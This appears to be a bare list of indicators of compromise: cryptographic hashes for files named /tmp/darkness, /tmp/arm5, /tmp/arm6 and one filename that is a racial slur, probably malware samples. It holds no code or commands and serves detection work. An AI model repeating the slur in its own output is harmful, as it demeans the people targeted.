SHA256 16c5cfb57ffcd3bd87e44f2c754d7fa6634c71cc06cf5d11a743d899cb546257
SHA512 8b0adab651805ea96e702e49013ae9e16d6858f0667bca352eefc12ae28d625f4a68135b915a14572ddec48ea22470e6d6dd9c91a2c4bfa03e35586ef6a246cc

/tmp/darkness

MD5 24393febb5e8a233a8df7f00b8c3b147
SHA1 f8240c5256c8a193ee8f2f93880203eca2f827d5
SHA256 49eaa16a775f35ae87b75eb7a31dc421adff1054ca3af19ec6a6c90e83f47d42
SHA512 be1ca8c139095fe4be2f8cbcdc4f5adf304e05a3f0f1f94b2c522957de0ce197b6ab8e16a17d1e3d8afbb06d9b3019bca134eeba3197bd6917fadb144a9a86c6

/tmp/arm5

MD5 e57c0097d80d17a52aad01a8c2e4f9fc
SHA1 fffadcdb51b879236df4d4cdf373216dd926e90e
SHA256 68a34ef0cc4e40fb5470c235ed5f2b583b619549b546dcfda3101d847f3e2f3a
SHA512 02e7100e343d14f88a1f68539dea16c633e8de9fb6859cf54c60873565f7666595a5ee131bc38ea5f5b306a740b7f8c8db68f3a124b77c9f63eee8f492d75464

/tmp/arm6

MD5 1e78f279e22858585947a52ad8b127d7
SHA1 62f68fbf960fd0bfda74d5d89d74cbf8eaa630f7
SHA256 616160f4a408c4dfe23d91f102a4f7db79e005b75013f34b4d0ea2e35a047377
SHA512 2d5439708fd887b3b9b79f877d0f1474c277b6459221726d428e96cdc1fdfea7665bdaab03c7a77df720713cc5eb9e90a5177f2c27212a2c5993b9338ce39921

/tmp/NIGGA7

MD5 658e8ab8f1bf7db543aa9b2b2fd595ce
SHA1 ce122d9bc9920bbd77826fcd7676f3081ec19752
SHA256 29e40415b4a7a270bd679a81ae16ab70c15d7a525b5701da5ce494600f60831c
SHA512 eb8056c08a88ce14bb4a028f9f93a70dfb54e0a83ac565ddb2c4d4ef8aeafba7b8105e4e14bd807ebcb46d987d625e3ccae655c3170ee5cc51b513a542e4984f